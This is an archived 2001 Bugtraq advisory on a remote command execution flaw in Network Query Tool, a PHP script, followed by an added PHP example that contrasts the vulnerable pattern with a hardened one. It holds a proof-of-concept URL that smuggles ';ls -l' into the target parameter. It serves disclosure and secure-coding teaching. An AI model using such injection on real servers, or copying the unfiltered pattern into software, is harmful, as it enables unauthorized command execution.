[22942] in bugtraq
[Advisory iSecureLabs] Network Query Tool remote command execution
daemon@ATHENA.MIT.EDU (Cabezon Aurélien)
Mon Oct 22 11:25:20 2001
Message-ID: <06ad01c15a8e$b204f610$a423fcc1@London>
From: Cabezon Aurélien <aurelien.cabezon@isecurelabs.com>
To: "Bugtraq@Securityfocus.Com" <bugtraq@securityfocus.com>
Cc: "Vulnwatch@Vulnwatch. Org" <vulnwatch@vulnwatch.org>,
"SecurITeam News" <news@securiteam.com>, <security@isecurelabs.com>
Date: Mon, 22 Oct 2001 02:15:43 +0200
--[ Network Query Tool 1.0 and Network Query Tool 1.0 Adapted for PHPNuke 5.2 remote command execution ]--
Problem discovered: 22/10/2001 by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com | http://www.isecurelabs.com/article.php?sid=147
--[ Description ]--
Network Query Tool 1.0 Adapted for PHPNuke 5.2 is a PHP script that allows
users to:
- Resolve/Reverse Lookup
- Get DNS Records
- Whois (Web)
- Whois (IP owner)
- Check port
- Ping host
- Traceroute to host
Network Query Tool does not filter shell meta-characters such as
&;`'\"|*?~<>^()[]{}$\n\r from user-supplied input before building the
command it runs. This allows any user to execute UNIX commands on the web
server with the privileges of the web server process.
--[ Exploit ]--
Example request that executes the ls -al command on the server:
http://www.TEST.com/network_query.php?portNum=80&queryType=all&target=www.someserver.com%3Bls+-l&Submit=Do+It
--[ Fix ]--
The developers have been notified.
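As an added illustration (not code from this advisory or from the Network Query Tool project, whose internals are not shown here), the assumed vulnerable pattern beside a hardened version; the function names are hypothetical and the inputs are constructed from the request above:

```php
<?php
// Added example, not NQT's own code. The advisory does not show the script's
// internals; this reconstructs the pattern it describes: a request parameter
// concatenated straight into a shell command line.

// Vulnerable (hypothetical) pattern: "host;ls -l" makes the shell run a second
// command. Only the command string is built here; nothing is executed.
function ping_vulnerable(string $target): string {
    return "ping -c 1 " . $target;
}

// Hardened: accept only a syntactically valid IP address or hostname, then
// let escapeshellarg() quote the single argument that is handed to the shell.
function valid_target(string $target): bool {
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // RFC 1123 style labels: letters, digits, hyphens (not leading/trailing),
    // 1-63 chars each, dot-separated, 253 chars overall.
    return strlen($target) <= 253
        && preg_match('/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $target) === 1;
}

function ping_hardened(string $target): ?string {
    if (!valid_target($target)) {
        return null;   // reject and report an input error; never run the command
    }
    return "ping -c 1 " . escapeshellarg($target);
}

// Constructed inputs: the advisory's URL decodes to "www.someserver.com;ls -l".
foreach (["www.someserver.com", "www.someserver.com;ls -l"] as $t) {
    printf("%-26s vulnerable: %s\n", $t, ping_vulnerable($t));
    printf("%-26s hardened:   %s\n", $t, ping_hardened($t) ?? "REJECTED");
}
```

escapeshellarg() alone would already turn the payload into one quoted argument, but the allow-list is worth keeping: it also stops a target that begins with "-" from being interpreted as an option by the tool being invoked, and it gives the application a clean place to log rejected input.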
--[ Information about Network Query Tool ]--
Network Query Tool 1.0 http://www.shat.net/php/nqt/
Network Query Tool 1.0 Adapted for PHPNuke 5.2 http://www.yacapa.com
---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.com